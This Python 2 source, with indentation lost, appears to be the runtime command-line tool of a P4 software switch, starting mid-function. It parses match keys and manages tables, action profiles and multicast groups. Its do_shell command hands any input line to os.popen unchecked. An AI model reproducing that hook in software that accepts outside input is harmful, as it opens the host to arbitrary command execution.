raise UIn_BadParamError(
"Invalid input, could not cast to integer, try in hex with 0x prefix"
)
try:
return int_to_bytes(input_, (bitwidth + 7) / 8)
except UIn_BadParamError:
raise
def parse_runtime_data(action, params):
def parse_param_(field, bw):
try:
return parse_param(field, bw)
except UIn_BadParamError as e:
raise UIn_RuntimeDataError(
"Error while parsing %s - %s" % (field, e)
)
bitwidths = [bw for( _, bw) in action.runtime_data]
byte_array = []
for input_str, bitwidth in zip(params, bitwidths):
byte_array += [bytes_to_string(parse_param_(input_str, bitwidth))]
return byte_array
_match_types_mapping = {
MatchType.EXACT : BmMatchParamType.EXACT,
MatchType.LPM : BmMatchParamType.LPM,
MatchType.TERNARY : BmMatchParamType.TERNARY,
MatchType.VALID : BmMatchParamType.VALID,
MatchType.RANGE : BmMatchParamType.RANGE,
}
def parse_match_key(table, key_fields):
def parse_param_(field, bw):
try:
return parse_param(field, bw)
except UIn_BadParamError as e:
raise UIn_MatchKeyError(
"Error while parsing %s - %s" % (field, e)
)
params = []
match_types = [t for (_, t, _) in table.key]
bitwidths = [bw for (_, _, bw) in table.key]
for idx, field in enumerate(key_fields):
param_type = _match_types_mapping[match_types[idx]]
bw = bitwidths[idx]
if param_type == BmMatchParamType.EXACT:
key = bytes_to_string(parse_param_(field, bw))
param = BmMatchParam(type = param_type,
exact = BmMatchParamExact(key))
elif param_type == BmMatchParamType.LPM:
try:
prefix, length = field.split("/")
except ValueError:
raise UIn_MatchKeyError(
"Invalid LPM value {}, use '/' to separate prefix "
"and length".format(field))
key = bytes_to_string(parse_param_(prefix, bw))
param = BmMatchParam(type = param_type,
lpm = BmMatchParamLPM(key, int(length)))
elif param_type == BmMatchParamType.TERNARY:
try:
key, mask = field.split("&&&")
except ValueError:
raise UIn_MatchKeyError(
"Invalid ternary value {}, use '&&&' to separate key and "
"mask".format(field))
key = bytes_to_string(parse_param_(key, bw))
mask = bytes_to_string(parse_param_(mask, bw))
if len(mask) != len(key):
raise UIn_MatchKeyError(
"Key and mask have different lengths in expression %s" % field
)
param = BmMatchParam(type = param_type,
ternary = BmMatchParamTernary(key, mask))
elif param_type == BmMatchParamType.VALID:
key = bool(int(field))
param = BmMatchParam(type = param_type,
valid = BmMatchParamValid(key))
elif param_type == BmMatchParamType.RANGE:
try:
start, end = field.split("->")
except ValueError:
raise UIn_MatchKeyError(
"Invalid range value {}, use '->' to separate range start "
"and range end".format(field))
start = bytes_to_string(parse_param_(start, bw))
end = bytes_to_string(parse_param_(end, bw))
if len(start) != len(end):
raise UIn_MatchKeyError(
"start and end have different lengths in expression %s" % field
)
if start > end:
raise UIn_MatchKeyError(
"start is less than end in expression %s" % field
)
param = BmMatchParam(type = param_type,
range = BmMatchParamRange(start, end))
else:
assert(0)
params.append(param)
return params
def printable_byte_str(s):
return ":".join("{:02x}".format(ord(c)) for c in s)
def BmMatchParam_to_str(self):
return BmMatchParamType._VALUES_TO_NAMES[self.type] + "-" +\
(self.exact.to_str() if self.exact else "") +\
(self.lpm.to_str() if self.lpm else "") +\
(self.ternary.to_str() if self.ternary else "") +\
(self.valid.to_str() if self.valid else "") +\
(self.range.to_str() if self.range else "")
def BmMatchParamExact_to_str(self):
return printable_byte_str(self.key)
def BmMatchParamLPM_to_str(self):
return printable_byte_str(self.key) + "/" + str(self.prefix_length)
def BmMatchParamTernary_to_str(self):
return printable_byte_str(self.key) + " &&& " + printable_byte_str(self.mask)
def BmMatchParamValid_to_str(self):
return ""
def BmMatchParamRange_to_str(self):
return printable_byte_str(self.start) + " -> " + printable_byte_str(self.end_)
BmMatchParam.to_str = BmMatchParam_to_str
BmMatchParamExact.to_str = BmMatchParamExact_to_str
BmMatchParamLPM.to_str = BmMatchParamLPM_to_str
BmMatchParamTernary.to_str = BmMatchParamTernary_to_str
BmMatchParamValid.to_str = BmMatchParamValid_to_str
BmMatchParamRange.to_str = BmMatchParamRange_to_str
# services is [(service_name, client_class), ...]
def thrift_connect(thrift_ip, thrift_port, services):
return utils.thrift_connect(thrift_ip, thrift_port, services)
def handle_bad_input(f):
@wraps(f)
def handle(*args, **kwargs):
try:
return f(*args, **kwargs)
except UIn_MatchKeyError as e:
print "Invalid match key:", e
except UIn_RuntimeDataError as e:
print "Invalid runtime data:", e
except UIn_Error as e:
print "Error:", e
except InvalidTableOperation as e:
error = TableOperationErrorCode._VALUES_TO_NAMES[e.code]
print "Invalid table operation (%s)" % error
except InvalidCounterOperation as e:
error = CounterOperationErrorCode._VALUES_TO_NAMES[e.code]
print "Invalid counter operation (%s)" % error
except InvalidMeterOperation as e:
error = MeterOperationErrorCode._VALUES_TO_NAMES[e.code]
print "Invalid meter operation (%s)" % error
except InvalidRegisterOperation as e:
error = RegisterOperationErrorCode._VALUES_TO_NAMES[e.code]
print "Invalid register operation (%s)" % error
except InvalidLearnOperation as e:
error = LearnOperationErrorCode._VALUES_TO_NAMES[e.code]
print "Invalid learn operation (%s)" % error
except InvalidSwapOperation as e:
error = SwapOperationErrorCode._VALUES_TO_NAMES[e.code]
print "Invalid swap operation (%s)" % error
except InvalidDevMgrOperation as e:
error = DevMgrErrorCode._VALUES_TO_NAMES[e.code]
print "Invalid device manager operation (%s)" % error
except InvalidCrcOperation as e:
error = CrcErrorCode._VALUES_TO_NAMES[e.code]
print "Invalid crc operation (%s)" % error
return handle
def handle_bad_input_mc(f):
@wraps(f)
def handle(*args, **kwargs):
pre_type = args[0].pre_type
if pre_type == PreType.None:
return handle_bad_input(f)(*args, **kwargs)
EType = {
PreType.SimplePre : SimplePre.InvalidMcOperation,
PreType.SimplePreLAG : SimplePreLAG.InvalidMcOperation
}[pre_type]
Codes = {
PreType.SimplePre : SimplePre.McOperationErrorCode,
PreType.SimplePreLAG : SimplePreLAG.McOperationErrorCode
}[pre_type]
try:
return handle_bad_input(f)(*args, **kwargs)
except EType as e:
error = Codes._VALUES_TO_NAMES[e.code]
print "Invalid PRE operation (%s)" % error
return handle
def deprecated_act_prof(substitute, with_selection=False,
strictly_deprecated=True):
# need two levels here because our decorator takes arguments
def deprecated_act_prof_(f):
# not sure if this is the right place for it, if I want it to play nice
# with @wraps
if strictly_deprecated:
f.__doc__ = "[DEPRECATED!] " + f.__doc__
f.__doc__ += "\nUse '{}' instead".format(substitute)
@wraps(f)
def wrapper(obj, line):
substitute_fn = getattr(obj, "do_" + substitute)
args = line.split()
obj.at_least_n_args(args, 1)
table_name = args[0]
table = obj.get_res("table", table_name, ResType.table)
if with_selection:
obj.check_indirect_ws(table)
else:
obj.check_indirect(table)
assert(table.action_prof is not None)
assert(table.action_prof.ref_cnt > 0)
if strictly_deprecated and table.action_prof.ref_cnt > 1:
raise UIn_Error(
"Legacy command does not work with shared action profiles")
args[0] = table.action_prof.name
if strictly_deprecated:
# writing to stderr in case someone is parsing stdout
sys.stderr.write(
"This is a deprecated command, use '{}' instead\n".format(
substitute))
return substitute_fn(" ".join(args))
# we add the handle_bad_input decorator "programatically"
return handle_bad_input(wrapper)
return deprecated_act_prof_
# thrift does not support unsigned integers
def hex_to_i16(h):
x = int(h, 0)
if (x > 0xFFFF):
raise UIn_Error("Integer cannot fit within 16 bits")
if (x > 0x7FFF): x-= 0x10000
return x
def i16_to_hex(h):
x = int(h)
if (x & 0x8000): x+= 0x10000
return x
def hex_to_i32(h):
x = int(h, 0)
if (x > 0xFFFFFFFF):
raise UIn_Error("Integer cannot fit within 32 bits")
if (x > 0x7FFFFFFF): x-= 0x100000000
return x
def i32_to_hex(h):
x = int(h)
if (x & 0x80000000): x+= 0x100000000
return x
def parse_bool(s):
if s == "true" or s == "True":
return True
if s == "false" or s == "False":
return False
try:
s = int(s, 0)
return bool(s)
except:
pass
raise UIn_Error("Invalid bool parameter")
class RuntimeAPI():
prompt = 'RuntimeCmd: '
intro = "Control utility for runtime P4 table manipulation"
@staticmethod
def get_thrift_services(pre_type):
services = [("standard", Standard.Client)]
if pre_type == PreType.SimplePre:
services += [("simple_pre", SimplePre.Client)]
elif pre_type == PreType.SimplePreLAG:
services += [("simple_pre_lag", SimplePreLAG.Client)]
else:
services += [(None, None)]
return services
def __init__(self, pre_type, standard_client, mc_client=None):
self.client = standard_client
self.mc_client = mc_client
self.pre_type = pre_type
def do_greet(self, line):
print "hello"
def do_EOF(self, line):
print
return True
def do_shell(self, line):
"Run a shell command"
output = os.popen(line).read()
print output
def get_res(self, type_name, name, res_type):
key = res_type, name
if key not in SUFFIX_LOOKUP_MAP:
raise UIn_ResourceError(type_name, name)
return SUFFIX_LOOKUP_MAP[key]
def at_least_n_args(self, args, n):
if len(args) < n:
raise UIn_Error("Insufficient number of args")
def exactly_n_args(self, args, n):
if len(args) != n:
raise UIn_Error(
"Wrong number of args, expected %d but got %d" % (n, len(args))
)
def _complete_res(self, array, text):
res = sorted(array.keys())
if not text:
return res
return [r for r in res if r.startswith(text)]
@handle_bad_input
def do_show_tables(self, line):
"List tables defined in the P4 program: show_tables"
self.exactly_n_args(line.split(), 0)
for table_name in sorted(TABLES):
print TABLES[table_name].table_str()
@handle_bad_input
def do_show_actions(self, line):
"List actions defined in the P4 program: show_actions"
self.exactly_n_args(line.split(), 0)
for action_name in sorted(ACTIONS):
print ACTIONS[action_name].action_str()
def _complete_tables(self, text):
return self._complete_res(TABLES, text)
def _complete_act_profs(self, text):
return self._complete_res(ACTION_PROFS, text)
@handle_bad_input
def do_table_show_actions(self, line):
"List one table's actions as per the P4 program: table_show_actions <table_name>"
args = line.split()
self.exactly_n_args(args, 1)
table_name = args[0]
table = self.get_res("table", table_name, ResType.table)
for action_name in sorted(table.actions):
print ACTIONS[action_name].action_str()
def complete_table_show_actions(self, text, line, start_index, end_index):
return self._complete_tables(text)
@handle_bad_input
def do_table_info(self, line):
"Show info about a table: table_info <table_name>"
args = line.split()
self.exactly_n_args(args, 1)
table_name = args[0]
table = self.get_res("table", table_name, ResType.table)
print table.table_str()
print "*" * 80
for action_name in sorted(table.actions):
print ACTIONS[action_name].action_str()
def complete_table_info(self, text, line, start_index, end_index):
return self._complete_tables(text)
# used for tables but also for action profiles
def _complete_actions(self, text, table_name = None, res = TABLES):
if not table_name:
actions = sorted(ACTIONS.keys())
elif table_name not in res:
return []
actions = sorted(res[table_name].actions.keys())
if not text:
return actions
return [a for a in actions if a.startswith(text)]
def _complete_table_and_action(self, text, line):
tables = sorted(TABLES.keys())
args = line.split()
args_cnt = len(args)
if args_cnt == 1 and not text:
return self._complete_tables(text)
if args_cnt == 2 and text:
return self._complete_tables(text)
table_name = args[1]
if args_cnt == 2 and not text:
return self._complete_actions(text, table_name)
if args_cnt == 3 and text:
return self._complete_actions(text, table_name)
return []
def _complete_act_prof_and_action(self, text, line):
act_profs = sorted(ACTION_PROFS.keys())
args = line.split()
args_cnt = len(args)
if args_cnt == 1 and not text:
return self._complete_act_profs(text)
if args_cnt == 2 and text:
return self._complete_act_profs(text)
act_prof_name = args[1]
if args_cnt == 2 and not text:
return self._complete_actions(text, act_prof_name, ACTION_PROFS)
if args_cnt == 3 and text:
return self._complete_actions(text, act_prof_name, ACTION_PROFS)
return []
# for debugging
def print_set_default(self, table_name, action_name, runtime_data):
print "Setting default action of", table_name
print "{0:20} {1}".format("action:", action_name)
print "{0:20} {1}".format(
"runtime data:",
"\t".join(printable_byte_str(d) for d in runtime_data)
)
@handle_bad_input
def do_table_set_default(self, line):
"Set default action for a match table: table_set_default <table name> <action name> <action parameters>"
args = line.split()
self.at_least_n_args(args, 2)
table_name, action_name = args[0], args[1]
table = self.get_res("table", table_name, ResType.table)
action = table.get_action(action_name)
if action is None:
raise UIn_Error(
"Table %s has no action %s" % (table_name, action_name)
)
if len(args[2:]) != action.num_params():
raise UIn_Error(
"Action %s needs %d parameters" % (action_name, action.num_params())
)
runtime_data = parse_runtime_data(action, args[2:])
self.print_set_default(table_name, action_name, runtime_data)
self.client.bm_mt_set_default_action(0, table.name, action.name, runtime_data)
def complete_table_set_default(self, text, line, start_index, end_index):
return self._complete_table_and_action(text, line)
@handle_bad_input
def do_table_reset_default(self, line):
"Reset default entry for a match table: table_reset_default <table name>"
args = line.split()
self.exactly_n_args(args, 1)
table_name = args[0]
table = self.get_res("table", table_name, ResType.table)
self.client.bm_mt_reset_default_entry(0, table.name)
def complete_table_reset_default(self, text, line, start_index, end_index):
return self._complete_tables(text)
def parse_runtime_data(self, action, action_params):
if len(action_params) != action.num_params():
raise UIn_Error(
"Action %s needs %d parameters" % (action.name, action.num_params())
)
return parse_runtime_data(action, action_params)
# for debugging
def print_table_add(self, match_key, action_name, runtime_data):
print "{0:20} {1}".format(
"match key:",
"\t".join(d.to_str() for d in match_key)
)
print "{0:20} {1}".format("action:", action_name)
print "{0:20} {1}".format(
"runtime data:",
"\t".join(printable_byte_str(d) for d in runtime_data)
)
@handle_bad_input
def do_table_num_entries(self, line):
"Return the number of entries in a match table (direct or indirect): table_num_entries <table name>"
args = line.split()
self.exactly_n_args(args, 1)
table_name = args[0]
table = self.get_res("table", table_name, ResType.table)
print self.client.bm_mt_get_num_entries(0, table.name)
def complete_table_num_entries(self, text, line, start_index, end_index):
return self._complete_tables(text)
@handle_bad_input
def do_table_clear(self, line):
"Clear all entries in a match table (direct or indirect), but not the default entry: table_clear <table name>"
args = line.split()
self.exactly_n_args(args, 1)
table_name = args[0]
table = self.get_res("table", table_name, ResType.table)
self.client.bm_mt_clear_entries(0, table.name, False)
def complete_table_clear(self, text, line, start_index, end_index):
return self._complete_tables(text)
@handle_bad_input
def do_table_add(self, line):
"Add entry to a match table: table_add <table name> <action name> <match fields> => <action parameters> [priority]"
args = line.split()
self.at_least_n_args(args, 3)
table_name, action_name = args[0], args[1]
table = self.get_res("table", table_name, ResType.table)
action = table.get_action(action_name)
if action is None:
raise UIn_Error(
"Table %s has no action %s" % (table_name, action_name)
)
if table.match_type in {MatchType.TERNARY, MatchType.RANGE}:
try:
priority = int(args.pop(-1))
except:
raise UIn_Error(
"Table is ternary, but could not extract a valid priority from args"
)
else:
priority = 0
for idx, input_ in enumerate(args[2:]):
if input_ == "=>": break
idx += 2
match_key = args[2:idx]
action_params = args[idx+1:]
if len(match_key) != table.num_key_fields():
raise UIn_Error(
"Table %s needs %d key fields" % (table_name, table.num_key_fields())
)
runtime_data = self.parse_runtime_data(action, action_params)
match_key = parse_match_key(table, match_key)
print "Adding entry to", MatchType.to_str(table.match_type), "match table", table_name
# disable, maybe a verbose CLI option?
self.print_table_add(match_key, action_name, runtime_data)
entry_handle = self.client.bm_mt_add_entry(
0, table.name, match_key, action.name, runtime_data,
BmAddEntryOptions(priority = priority)
)
print "Entry has been added with handle", entry_handle
def complete_table_add(self, text, line, start_index, end_index):
return self._complete_table_and_action(text, line)
@handle_bad_input
def do_table_set_timeout(self, line):
"Set a timeout in ms for a given entry; the table has to support timeouts: table_set_timeout <table_name> <entry handle> <timeout (ms)>"
args = line.split()
self.exactly_n_args(args, 3)
table_name = args[0]
table = self.get_res("table", table_name, ResType.table)
if not table.support_timeout:
raise UIn_Error(
"Table {} does not support entry timeouts".format(table_name))
try:
entry_handle = int(args[1])
except:
raise UIn_Error("Bad format for entry handle")
try:
timeout_ms = int(args[2])
except:
raise UIn_Error("Bad format for timeout")
print "Setting a", timeout_ms, "ms timeout for entry", entry_handle
self.client.bm_mt_set_entry_ttl(0, table.name, entry_handle, timeout_ms)
def complete_table_set_timeout(self, text, line, start_index, end_index):
return self._complete_tables(text)
@handle_bad_input
def do_table_modify(self, line):
"Add entry to a match table: table_modify <table name> <action name> <entry handle> [action parameters]"
args = line.split()
self.at_least_n_args(args, 3)
table_name, action_name = args[0], args[1]
table = self.get_res("table", table_name, ResType.table)
action = table.get_action(action_name)
if action is None:
raise UIn_Error(
"Table %s has no action %s" % (table_name, action_name)
)
try:
entry_handle = int(args[2])
except:
raise UIn_Error("Bad format for entry handle")
action_params = args[3:]
if args[3] == "=>":
# be more tolerant
action_params = args[4:]
runtime_data = self.parse_runtime_data(action, action_params)
print "Modifying entry", entry_handle, "for", MatchType.to_str(table.match_type), "match table", table_name
entry_handle = self.client.bm_mt_modify_entry(
0, table.name, entry_handle, action.name, runtime_data
)
def complete_table_modify(self, text, line, start_index, end_index):
return self._complete_table_and_action(text, line)
@handle_bad_input
def do_table_delete(self, line):
"Delete entry from a match table: table_delete <table name> <entry handle>"
args = line.split()
self.exactly_n_args(args, 2)
table_name = args[0]
table = self.get_res("table", table_name, ResType.table)
try:
entry_handle = int(args[1])
except:
raise UIn_Error("Bad format for entry handle")
print "Deleting entry", entry_handle, "from", table_name
self.client.bm_mt_delete_entry(0, table.name, entry_handle)
def complete_table_delete(self, text, line, start_index, end_index):
return self._complete_tables(text)
def check_indirect(self, table):
if table.type_ not in {TableType.indirect, TableType.indirect_ws}:
raise UIn_Error("Cannot run this command on non-indirect table")
def check_indirect_ws(self, table):
if table.type_ != TableType.indirect_ws:
raise UIn_Error(
"Cannot run this command on non-indirect table,"\
" or on indirect table with no selector")
def check_act_prof_ws(self, act_prof):
if not act_prof.with_selection:
raise UIn_Error(
"Cannot run this command on an action profile without selector")
@handle_bad_input
def do_act_prof_create_member(self, line):
"Add a member to an action profile: act_prof_create_member <action profile name> <action_name> [action parameters]"
args = line.split()
self.at_least_n_args(args, 2)
act_prof_name, action_name = args[0], args[1]
act_prof = self.get_res("action profile", act_prof_name,
ResType.action_prof)
action = act_prof.get_action(action_name)
if action is None:
raise UIn_Error("Action profile '{}' has no action '{}'".format(
act_prof_name, action_name))
action_params = args[2:]
runtime_data = self.parse_runtime_data(action, action_params)
mbr_handle = self.client.bm_mt_act_prof_add_member(
0, act_prof.name, action.name, runtime_data)
print "Member has been created with handle", mbr_handle
def complete_act_prof_create_member(self, text, line, start_index, end_index):
return self._complete_act_prof_and_action(text, line)
@deprecated_act_prof("act_prof_create_member")
def do_table_indirect_create_member(self, line):
"Add a member to an indirect match table: table_indirect_create_member <table name> <action_name> [action parameters]"
pass
def complete_table_indirect_create_member(self, text, line, start_index, end_index):
return self._complete_table_and_action(text, line)
@handle_bad_input
def do_act_prof_delete_member(self, line):
"Delete a member in an action profile: act_prof_delete_member <action profile name> <member handle>"
args = line.split()
self.exactly_n_args(args, 2)
act_prof_name, action_name = args[0], args[1]
act_prof = self.get_res("action profile", act_prof_name,
ResType.action_prof)
try:
mbr_handle = int(args[1])
except:
raise UIn_Error("Bad format for member handle")
self.client.bm_mt_act_prof_delete_member(0, act_prof.name, mbr_handle)
def complete_act_prof_delete_member(self, text, line, start_index, end_index):
return self._complete_act_profs(text)
@deprecated_act_prof("act_prof_delete_member")
def do_table_indirect_delete_member(self, line):
"Delete a member in an indirect match table: table_indirect_delete_member <table name> <member handle>"
pass
def complete_table_indirect_delete_member(self, text, line, start_index, end_index):
return self._complete_tables(text)
@handle_bad_input
def do_act_prof_modify_member(self, line):
"Modify member in an action profile: act_prof_modify_member <action profile name> <action_name> <member_handle> [action parameters]"
args = line.split()
self.at_least_n_args(args, 3)
act_prof_name, action_name = args[0], args[1]
act_prof = self.get_res("action profile", act_prof_name,
ResType.action_prof)
action = act_prof.get_action(action_name)
if action is None:
raise UIn_Error("Action profile '{}' has no action '{}'".format(
act_prof_name, action_name))
try:
mbr_handle = int(args[2])
except:
raise UIn_Error("Bad format for member handle")
action_params = args[3:]
if args[3] == "=>":
# be more tolerant
action_params = args[4:]
runtime_data = self.parse_runtime_data(action, action_params)
mbr_handle = self.client.bm_mt_act_prof_modify_member(
0, act_prof.name, mbr_handle, action.name, runtime_data)
def complete_act_prof_modify_member(self, text, line, start_index, end_index):
return self._complete_act_prof_and_action(text, line)
@deprecated_act_prof("act_prof_modify_member")
def do_table_indirect_modify_member(self, line):
"Modify member in an indirect match table: table_indirect_modify_member <table name> <action_name> <member_handle> [action parameters]"
pass
def complete_table_indirect_modify_member(self, text, line, start_index, end_index):
return self._complete_table_and_action(text, line)
def indirect_add_common(self, line, ws=False):
args = line.split()
self.at_least_n_args(args, 2)
table_name = args[0]
table = self.get_res("table", table_name, ResType.table)
if ws:
self.check_indirect_ws(table)
else:
self.check_indirect(table)
if table.match_type in {MatchType.TERNARY, MatchType.RANGE}:
try:
priority = int(args.pop(-1))
except:
raise UIn_Error(
"Table is ternary, but could not extract a valid priority from args"
)
else:
priority = 0
for idx, input_ in enumerate(args[1:]):
if input_ == "=>": break
idx += 1
match_key = args[1:idx]
if len(args) != (idx + 2):
raise UIn_Error("Invalid arguments, could not find handle")
handle = args[idx+1]
try:
handle = int(handle)
except:
raise UIn_Error("Bad format for handle")
match_key = parse_match_key(table, match_key)
print "Adding entry to indirect match table", table.name
return table.name, match_key, handle, BmAddEntryOptions(priority = priority)
@handle_bad_input
def do_table_indirect_add(self, line):
"Add entry to an indirect match table: table_indirect_add <table name> <match fields> => <member handle> [priority]"
table_name, match_key, handle, options = self.indirect_add_common(line)
entry_handle = self.client.bm_mt_indirect_add_entry(
0, table_name, match_key, handle, options
)
print "Entry has been added with handle", entry_handle
def complete_table_indirect_add(self, text, line, start_index, end_index):
return self._complete_tables(text)
@handle_bad_input
def do_table_indirect_add_with_group(self, line):
"Add entry to an indirect match table: table_indirect_add <table name> <match fields> => <group handle> [priority]"
table_name, match_key, handle, options = self.indirect_add_common(line, ws=True)
entry_handle = self.client.bm_mt_indirect_ws_add_entry(
0, table_name, match_key, handle, options
)
print "Entry has been added with handle", entry_handle
def complete_table_indirect_add_with_group(self, text, line, start_index, end_index):
return self._complete_tables(text)
@handle_bad_input
def do_table_indirect_delete(self, line):
"Delete entry from an indirect match table: table_indirect_delete <table name> <entry handle>"
args = line.split()
self.exactly_n_args(args, 2)
table_name = args[0]
table = self.get_res("table", table_name, ResType.table)
self.check_indirect(table)
try:
entry_handle = int(args[1])
except:
raise UIn_Error("Bad format for entry handle")
print "Deleting entry", entry_handle, "from", table_name
self.client.bm_mt_indirect_delete_entry(0, table.name, entry_handle)
def complete_table_indirect_delete(self, text, line, start_index, end_index):
return self._complete_tables(text)
def indirect_set_default_common(self, line, ws=False):
args = line.split()
self.exactly_n_args(args, 2)
table_name = args[0]
table = self.get_res("table", table_name, ResType.table)
if ws:
self.check_indirect_ws(table)
else:
self.check_indirect(table)
try:
handle = int(args[1])
except:
raise UIn_Error("Bad format for handle")
return table.name, handle
@handle_bad_input
def do_table_indirect_set_default(self, line):
"Set default member for indirect match table: table_indirect_set_default <table name> <member handle>"
table_name, handle = self.indirect_set_default_common(line)
self.client.bm_mt_indirect_set_default_member(0, table_name, handle)
def complete_table_indirect_set_default(self, text, line, start_index, end_index):
return self._complete_tables(text)
@handle_bad_input
def do_table_indirect_set_default_with_group(self, line):
"Set default group for indirect match table: table_indirect_set_default <table name> <group handle>"
table_name, handle = self.indirect_set_default_common(line, ws=True)
self.client.bm_mt_indirect_ws_set_default_group(0, table_name, handle)
def complete_table_indirect_set_default_with_group(self, text, line, start_index, end_index):
return self._complete_tables(text)
@handle_bad_input
def do_table_indirect_reset_default(self, line):
"Reset default entry for indirect match table: table_indirect_reset_default <table name>"
args = line.split()
self.exactly_n_args(args, 1)
table_name = args[0]
table = self.get_res("table", table_name, ResType.table)
self.client.bm_mt_indirect_reset_default_entry(0, table.name)
def complete_table_indirect_reset_default(self, text, line, start_index, end_index):
return self._complete_tables(text)
@handle_bad_input
def do_act_prof_create_group(self, line):
"Add a group to an action pofile: act_prof_create_group <action profile name>"
args = line.split()
self.exactly_n_args(args, 1)
act_prof_name = args[0]
act_prof = self.get_res("action profile", act_prof_name,
ResType.action_prof)
self.check_act_prof_ws(act_prof)
grp_handle = self.client.bm_mt_act_prof_create_group(0, act_prof.name)
print "Group has been created with handle", grp_handle
def complete_act_prof_create_group(self, text, line, start_index, end_index):
return self._complete_act_profs(text)
@deprecated_act_prof("act_prof_create_group", with_selection=True)
def do_table_indirect_create_group(self, line):
"Add a group to an indirect match table: table_indirect_create_group <table name>"
pass
def complete_table_indirect_create_group(self, text, line, start_index, end_index):
return self._complete_tables(text)
@handle_bad_input
def do_act_prof_delete_group(self, line):
"Delete a group from an action profile: act_prof_delete_group <action profile name> <group handle>"
args = line.split()
self.exactly_n_args(args, 2)
act_prof_name = args[0]
act_prof = self.get_res("action profile", act_prof_name,
ResType.action_prof)
self.check_act_prof_ws(act_prof)
try:
grp_handle = int(args[1])
except:
raise UIn_Error("Bad format for group handle")
self.client.bm_mt_act_prof_delete_group(0, act_prof.name, grp_handle)
def complete_act_prof_delete_group(self, text, line, start_index, end_index):
return self._complete_act_profs(text)
@deprecated_act_prof("act_prof_delete_group", with_selection=True)
def do_table_indirect_delete_group(self, line):
"Delete a group: table_indirect_delete_group <table name> <group handle>"
pass
def complete_table_indirect_delete_group(self, text, line, start_index, end_index):
return self._complete_tables(text)
@handle_bad_input
def do_act_prof_add_member_to_group(self, line):
"Add member to group in an action profile: act_prof_add_member_to_group <action profile name> <member handle> <group handle>"
args = line.split()
self.exactly_n_args(args, 3)
act_prof_name = args[0]
act_prof = self.get_res("action profile", act_prof_name,
ResType.action_prof)
self.check_act_prof_ws(act_prof)
try:
mbr_handle = int(args[1])
except:
raise UIn_Error("Bad format for member handle")
try:
grp_handle = int(args[2])
except:
raise UIn_Error("Bad format for group handle")
self.client.bm_mt_act_prof_add_member_to_group(
0, act_prof.name, mbr_handle, grp_handle)
def complete_act_prof_add_member_to_group(self, text, line, start_index, end_index):
return self._complete_act_profs(text)
@deprecated_act_prof("act_prof_add_member_to_group", with_selection=True)
def do_table_indirect_add_member_to_group(self, line):
"Add member to group: table_indirect_add_member_to_group <table name> <member handle> <group handle>"
pass
def complete_table_indirect_add_member_to_group(self, text, line, start_index, end_index):
return self._complete_tables(text)
@handle_bad_input
def do_act_prof_remove_member_from_group(self, line):
"Remove member from group in action profile: act_prof_remove_member_from_group <action profile name> <member handle> <group handle>"
args = line.split()
self.exactly_n_args(args, 3)
act_prof_name = args[0]
act_prof = self.get_res("action profile", act_prof_name,
ResType.action_prof)
self.check_act_prof_ws(act_prof)
try:
mbr_handle = int(args[1])
except:
raise UIn_Error("Bad format for member handle")
try:
grp_handle = int(args[2])
except:
raise UIn_Error("Bad format for group handle")
self.client.bm_mt_act_prof_remove_member_from_group(
0, act_prof.name, mbr_handle, grp_handle)
def complete_act_prof_remove_member_from_group(self, text, line, start_index, end_index):
return self._complete_act_profs(text)
@deprecated_act_prof("act_prof_remove_member_from_group", with_selection=True)
def do_table_indirect_remove_member_from_group(self, line):
"Remove member from group: table_indirect_remove_member_from_group <table name> <member handle> <group handle>"
pass
def complete_table_indirect_remove_member_from_group(self, text, line, start_index, end_index):
return self._complete_tables(text)
def check_has_pre(self):
if self.pre_type == PreType.None:
raise UIn_Error(
"Cannot execute this command without packet replication engine"
)
def get_mgrp(self, s):
try:
return int(s)
except:
raise UIn_Error("Bad format for multicast group id")
@handle_bad_input_mc
def do_mc_mgrp_create(self, line):
"Create multicast group: mc_mgrp_create <group id>"
self.check_has_pre()
args = line.split()
self.exactly_n_args(args, 1)
mgrp = self.get_mgrp(args[0])
print "Creating multicast group", mgrp
mgrp_hdl = self.mc_client.bm_mc_mgrp_create(0, mgrp)
assert(mgrp == mgrp_hdl)
@handle_bad_input_mc
def do_mc_mgrp_destroy(self, line):
"Destroy multicast group: mc_mgrp_destroy <group id>"
self.check_has_pre()
args = line.split()
self.exactly_n_args(args, 1)
mgrp = self.get_mgrp(args[0])
print "Destroying multicast group", mgrp
self.mc_client.bm_mc_mgrp_destroy(0, mgrp)
def ports_to_port_map_str(self, ports, description="port"):
last_port_num = 0
port_map_str = ""
ports_int = []
for port_num_str in ports:
try:
port_num = int(port_num_str)
except:
raise UIn_Error("'%s' is not a valid %s number"
"" % (port_num_str, description))
if port_num < 0:
raise UIn_Error("'%s' is not a valid %s number"
"" % (port_num_str, description))
ports_int.append(port_num)
ports_int.sort()
for port_num in ports_int:
if port_num == (last_port_num - 1):
raise UIn_Error("Found duplicate %s number '%s'"
"" % (description, port_num))
port_map_str += "0" * (port_num - last_port_num) + "1"
last_port_num = port_num + 1
return port_map_str[::-1]
def parse_ports_and_lags(self, args):
ports = []
i = 1
while (i < len(args) and args[i] != '|'):
ports.append(args[i])
i += 1
port_map_str = self.ports_to_port_map_str(ports)
if self.pre_type == PreType.SimplePreLAG:
i += 1
lags = [] if i == len(args) else args[i:]
lag_map_str = self.ports_to_port_map_str(lags, description="lag")
else:
lag_map_str = None
return port_map_str, lag_map_str
@handle_bad_input_mc
def do_mc_node_create(self, line):
"Create multicast node: mc_node_create <rid> <space-separated port list> [ | <space-separated lag list> ]"
self.check_has_pre()
args = line.split()
self.at_least_n_args(args, 1)
try:
rid = int(args[0])
except:
raise UIn_Error("Bad format for rid")
port_map_str, lag_map_str = self.parse_ports_and_lags(args)
if self.pre_type == PreType.SimplePre:
print "Creating node with rid", rid, "and with port map", port_map_str
l1_hdl = self.mc_client.bm_mc_node_create(0, rid, port_map_str)
else:
print "Creating node with rid", rid, ", port map", port_map_str, "and lag map", lag_map_str
l1_hdl = self.mc_client.bm_mc_node_create(0, rid, port_map_str, lag_map_str)
print "node was created with handle", l1_hdl
def get_node_handle(self, s):
try:
return int(s)
except:
raise UIn_Error("Bad format for node handle")
@handle_bad_input_mc
def do_mc_node_update(self, line):
"Update multicast node: mc_node_update <node handle> <space-separated port list> [ | <space-separated lag list> ]"
self.check_has_pre()
args = line.split()
self.at_least_n_args(args, 2)
l1_hdl = self.get_node_handle(args[0])
port_map_str, lag_map_str = self.parse_ports_and_lags(args)
if self.pre_type == PreType.SimplePre:
print "Updating node", l1_hdl, "with port map", port_map_str
self.mc_client.bm_mc_node_update(0, l1_hdl, port_map_str)
else:
print "Updating node", l1_hdl, "with port map", port_map_str, "and lag map", lag_map_str
self.mc_client.bm_mc_node_update(0, l1_hdl, port_map_str, lag_map_str)
